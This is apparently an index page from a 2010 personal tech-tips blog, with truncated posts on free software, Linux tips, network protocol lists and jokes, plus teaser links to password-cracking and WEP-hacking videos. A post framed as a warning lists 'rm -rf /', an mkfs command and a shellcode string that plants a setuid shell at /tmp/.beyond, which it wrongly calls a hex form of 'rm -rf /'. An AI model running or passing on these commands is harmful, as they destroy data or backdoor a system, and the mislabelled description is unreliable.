Tips related to

Wednesday, 31 March 2010

WindowsXPLiveUSBEdition2008-22Portable

download h...

AxCrypt - File Encryption for Windows

AxCrypt - Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.download h...

PDF Split and Merge

PDF Split and Merge is an easy to use tool to merge and split pdf documents. Console and GUI versions are available. The GUI is written in Java Swing and it provides functions to select files and set options. It's made over the iText library.download h...

KeePass Password Safe

KeePass Password Safe is a free, open source, light-weight and easy-to-use password manager for Windows. You can store your passwords in a highly-encrypted database, which is locked with one master password or key file.download h...

XBMC Media Center

XBMC Media Center is a free cross-platform media player software and entertainment system application framework for Linux, Mac, and Windows. XBMC is capable of playing back and streaming all popular video, audio, and picture formats out-of-the-box.download h...

TV-browser

TV-Browser is a java-based TV guide which can be easily extended with lots of plugins. It is designed to look like your paper TV guide.download h...

home player

HomePlayer is an extention of the FreePlayer software provided by the french internet providerdownload h...

TUX-PAINT

A drawing program for young children with sound effects, a cartoon character, and fun 'rubber stamp'/'stickerbook' pictures. download h...

Tuesday, 23 March 2010

Kaspersky Anti-Virus 7.0

click here to downl...

How install/share printer on Redhat linux machine?

Edit /etc/samba/smb.conf file with [global] workgroup = WORKGROUP security = user printcap name = cups disable spools = Yes show add printer wizard = No printing = cups [printers] comment = All Printers path = /var/spool/samba printer admin = tech, general create mask = 0770 guest ok = Yes printable = Yes use client driver = Yes browseable = Yes # service smb restart (Restar samba server once) Go to Win client machine Run--> 192.168.1.11 --> user name --> Password --> right click on shared printer --> connect --> follow up coming istructions.... fin...

Linux commands

By default most of the commands you can execute are placed in the /bin folder. However, you can add another folder where your user will look for commands from. Lets do that ;) (if in any of the following cases you get "permission denied" error, then do the same action, but logged as root.) (first create that folder, in this example ~/.bin)$mkdir ~/.bin(next, lets add that folder to PATH via ~/.bashrc)$nano ~/.bashrc(in the ~/.bashrc file, simply add the following line)$export PATH=$PATH:~/.bin Great, you have your own folder in which your shells will look for commands whenever you type a command. Now we need to only make bash scripts for the commands in the folder. Note that we could have just made the scripts in the default /bin folder,...

10 ways to Tweak your Linux Boot Process

Linux rarely needs to be rebooted. But when it does, it’s often slow to boot. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult. (although some, unfortunately, are). Let’s take a look. #1: Disable unnecessary services Depending upon the use of the machine, plenty of services won’t be needed. Using Linux just for a desktop? Then you won’t need sendmail, httpd, and many other services. If your server is only a Web server, you can shut off many services as well. To do this, you can go to the Administration menu and take a look at the Services entry. Just deselect all of the services you don’t want to start. #2: Disable unnecessary kernel modules If your desktop is wired to the Ethernet, you...

Deadly Linux commands that you should avoid.

These are the list of deadly Linux commands that you should avoid. 1. Code: rm -rf / This command will recursively and forcefully delete all the files inside the root directory. 2. Code: char esp[] __attribute__ ((section(".text"))) /* e.s.prelease */= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68""\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99""\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7""\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56""\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31""\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69""\x6e\x2f\x73\x68\x00\x2d\x63\x00""cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;"; This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users. 3. Code: mkfs.ext3...

Sunday, 21 March 2010

chianese search engine BAIDU

Many people have asked about the meaning of our name. 'Baidu' was inspired by a poem written more than 800 years ago during the Song Dynasty. The poem compares the search for a retreating beauty amid chaotic glamour with the search for one's dream while confronted by life's many obstacles. '...hundreds and thousands of times, for her I searched in chaos, suddenly, I turned by chance, to where the lights were waning, and there she stood.' Baidu, whose literal meaning is hundreds of times, represents persistent search for the ide...

The Monk Who Sold His Ferrari(Robin S.Sharma)

click here to downl...

SetupCloneDVD2

click here to downl...

PhotoScapeSetup_V3.4

click here to downl...

3dsudoku

click here to downl...

3d animation - 3d studio max v7 0

DOWNLOAD 3d stdio ...

Wireless WEP Key Hacking

click here to downl...

Saturday, 20 March 2010

PHP Tutorials - SQL Injection002

click here to downl...

PHP Tutorials - SQL Injection001

click here to downl...

how to crack windows passwords with no tools

 click here to downl...

Monday, 15 March 2010

How to hide a folder without any software in windows.

Step 1:- First open character map from program->accessories->system tools->character map. Step 2:- Then in font name Arial find a character with keystroke Alt+0160. Step 3:- Copy the character. Step 4:- Let the name of the folder to hide is "target", Right click that folder and rename it by pasting the character which is copied from the character map. Step 5:- You will see the folder is now anonymous.Right click the folder and click properties ,select the customize tab abd then click on change icon . Step 6:- In the window that appear select a blank icon ,click OK ad then Apply the changes. Step 7:- You have sucessfully hide a fold...

Friday, 12 March 2010

basic of computers

Computers are made of the following basic components: 1. Case with hardware inside: * Power Supply - The power supply comes with the case, but this component is mentioned separately since there are various types of power supplies. The one you should get depends on the requirements of your system. This will be discussed in more detail later * Motherboard - This is where the core components of your computer reside which are listed below. Also the support cards for video, sound, networking and more are mounted into this board.  :::Microprocessor - This is the brain of your computer. It performs commands and instructions and controls the operation of the computer.  :::Memory - The RAM in your system is mounted on the motherboard. This is memory that must be powered on to retain its...

Friday, 5 March 2010

The greate mystry-Barmuda Triangle

Aircraft incident     * 1945: December 5, Flight 19 (5 TBF Avengers) lost with 14 airmen, and later the same day PBM Mariner BuNo 59225 lost with 13 airmen while searching for Flight 19.     * 1948: January 30, Avro Tudor G-AHNP Star Tiger lost with 6 crew and 25 passengers, en route from Santa Maria Airport in the Azores to Kindley Field, Bermuda.     * 1948: December 28, Douglas DC-3 NC16002 lost with 3 crew and 29 passengers, en route from San Juan, Puerto Rico, to Miami.     * 1949: January 17, Avro Tudor G-AGRE Star Ariel lost with 7 crew and 13 passengers, en route from Kindley Field, Bermuda, to Kingston Airport, Jamaica. sea incident     * 1843: USS Grampus,...

Future of mobile technology.

This is not a virtual thinking. This is a picture of a famous technical country who break many of record in mobile technology. Engg makes mobile out of demand and for increment of technology.We made a recent technology but these are the output of mobile creati...

masti of software engg.

If a software engg make a movie then name of movies will be............... 1. Hang To Hona Hi Tha !!!!!!!!!!!! 2. Meri Disc Tumhare Paas Hai 3. Aao Chat Kare 4. Programmer No.1 5. Mera Naam Developer 6. Java Wale Job Le Jayenge 7. Hum Apke Memory Mein Rehte Hein 8. Do Processor Baarah Terminal 9. Tera Code Chal Gaya 10. Har Din Jo Mail Karega 11. Network Ke Us Paar 12. Debugging Koi Khel Nahi 13. Jish Desh Mein Bill Gates Rehta Hai 14. Raju Ban Gaya Administrator .! 15. Client Ek Numbari Programmer Dus Numbari 16. Login Karo Sajana 18. Naukar PC Ka 19. 1942 -- A Bug Story 20. Kaho Na Virus Hai 21. Crash Se Crash Tak 22. Haan Maine Bhi Debug Kiya Hai 23. Password De Ke Dekho 24. RAM-ayan. 25. Kya Mouse ne kaha....

List of network protocols

Layer 1 protocols (Physical Layer) 1) ADSL- Asymmetric Digital Subscriber Line 2) ISDN- Integrated Services Digital Network 3) PDH- Plesiochronous Digital Hierarchy 4) RS-232 5) SDH- Synchronous Digital Hierarchy 6) SONET- Synchronous Optical NETworking Layer 1+2 protocols 1) Ethernet 2) GFP- Generic Framing Procedure 3) OTN- Optical Transport Network(Optical Channel Wrapper or Digital Wrapper Technology) Layer 2 protocols (Data Link Layer) 1) ARCnet- Attached Resource Computer NETwork 2) CDP- Cisco Discovery Protocol 3) DCAP- Data Link Switching Client Access Protocol 4) DTP-Dynamic Trunking Protocol 5) Econet 6) FDDI- Fiber Distributed Data Interface 7) Frame Relay 8) ITU-T G.hn Data Link Layer 9) HDLC-- High-Level Data Link Control 10)...

Thursday, 4 March 2010

List of protocols

Pro-active(table-driven)routing:AWDS=Ad-hoc Wireless distribution service Babel=DSDV CSGR=Clusterhead gateway switch routing protocol DFR=direction forward routing DBF=distributed bellmanford outing protocol DSDV=High Dynamic destination sequence Distance Vectorrouting protocol Guess work HSR=hierarical state routing protocol IRAP=Intrazone Routing Protol OLSR=Optimized Link State Routing protocol TBRPF=Topology dissemination based on Reverse-Path forwarding routing protocol WAR=Wireless aided routing WRP=Wireless routing protocol Reactive (on-demand)protocol:SENCAST Multirate Ad-hoc on demand distance vector routing protocol Reliable Ad-hoc on demand distance vector routing protocol Ariande Assosiativity based routing Ad-hoc On-demand distance...

List of Web Browser

A browser is usually included with the installation of your operating system, but you are not restricted to that choice. Some of the factors to consider when deciding which browser best suits your needs include     * compatibility - Does the browser work with your operating system?     * security - Do you feel that your browser offers you the level of security you want?     * ease of use - Are the menus and options easy to understand and use?     * functionality - Does the browser interpret web content correctly? If you need to install other plug-ins or devices to translate certain types of content, do they work?     * appeal - Do you find the interface and way...

Wednesday, 3 March 2010

How to know if anyone is online or not on GMAIL

The technology g-mail "invisible" is might be recent gadget on google talk and gmail chat. If you want to know about these mister india who's are not offline but ofcourse not online on your G-mail.You can know about that fron these steps. you want to know about who's invisible on gmail (1)first open the chat window for contact(2)if you see the massess "chat is off-record" then insert your appropriate email-id and password (3)if you see a massess in red link"mukesh25011988@gmail.com is offline and can't received your massess right now" it indicate user are really offline(4)and if you get nothing then user is invisible or any status updates in gray it means the user is online but invisible....

hack computer with calculator

download this vi...

crack window vista password

download this vi...

Tuesday, 2 March 2010

Admin password hacking (cracked)

CLICK HERE TO DOWNL...

Page 1 of 7212345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | 100 Web Hosting